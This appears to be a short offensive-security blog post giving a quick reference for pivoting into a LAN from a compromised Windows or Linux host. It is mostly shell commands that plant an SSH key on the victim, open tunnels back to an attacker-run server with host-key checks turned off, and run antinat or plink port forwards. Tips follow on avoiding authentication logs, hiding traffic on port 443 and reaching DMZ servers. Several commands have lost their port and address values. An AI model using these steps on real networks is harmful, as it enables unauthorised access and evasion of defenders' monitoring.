Quick Windows and Linux LAN pivoting
Published Feb 17, 2018
Note: When I wrote this many years ago, I often used it as a quick refernce. It is nothing exceptional, just your usual display of SSH as a server, VPN, proxy, router, etc :)
The idea is to execute a SOCKS5 server on the compromised target and forward the local port remotely via SSH.
A remote server or any other means of exposing a port on the internet is required. When an SSH server is not available, antinat comes to the rescue.
On your server:
useradd -m -s /bin/nologin targetname
ssh-keygen -t ecdsa -f /tmp/sshkey -q -N ""
mkdir /home/targetname/.ssh
cp /tmp/sshkey.pub /home/targetname/.ssh/authorized_keys
chown -R targetname:targetname /home/targetname/.ssh
chmod 600 /home/targetname/.ssh/authorized_keys
cat /tmp/sshkey
Copy the content of /tmp/sshkey
On the compromised host:
echo "my copied sshkey" >> /tmp/.keyfile
chmod 600 /tmp/.keyfile
ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -L 22: -i /tmp/.keyfile -fNT targetname@myserver
Now on your server:
ssh -D compromiseduser@ -p 2222 -fNT
We can combine the antinat
proxy with the above procedure to avoid logging into the SSH server and thus writing to the authentication logs.
Instead of using the SOCKS options, upload the provided package and directly forward the antinat
./antinat -cantinat.xml
ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -L -i /tmp/.keyfile -fNT targetname@myserver
Upload the package and extract it.
Start the antinat
binary (no admin permissions required):
antinat.exe -a -cC:\temp\antinat.xml
Forward the antinat
port with plink
echo y | plink -ssh -noagent -pw "wrongpassword" targetname@myserver
plink -ssh -noagent -C -T -N -pw "password" -R targetname@myserver
PuTTY natively supports SSH via HTTP, and so does plink
, but it can only work via CLI if a preconfigured session already exists. More info.
- Make SSH listen on port 443 to be less suspicious and bypass restrictive firewall rules.
- Use corkscrew for SSH via HTTP Proxy.
- Use reGeorg to directly jump in DMZ backend servers.